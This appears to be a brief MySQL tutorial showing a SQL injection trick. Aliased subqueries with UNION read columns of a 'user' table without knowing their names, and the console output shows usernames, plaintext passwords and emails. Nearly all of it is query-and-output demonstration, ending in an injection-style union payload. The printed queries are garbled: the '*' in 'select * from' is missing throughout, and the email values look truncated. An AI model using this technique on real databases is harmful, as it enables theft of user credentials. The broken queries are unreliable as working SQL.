Mysql如何巧妙的绕过未知字段名详解

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select  from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select  from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select  from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110. |
| 2 | test | test123 | 119@119. |
| 3 | cs | cs123 | 120@120. |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select  from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select  from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110. |
| 119@119. |
| 120@120. |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select  from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select  from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120. |
+-------------+
1 row in set (0.01 sec)
 
mysql> select  from user where id=1 union select (select e.4 from (select  from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select  from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110. |
| 120@120. | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)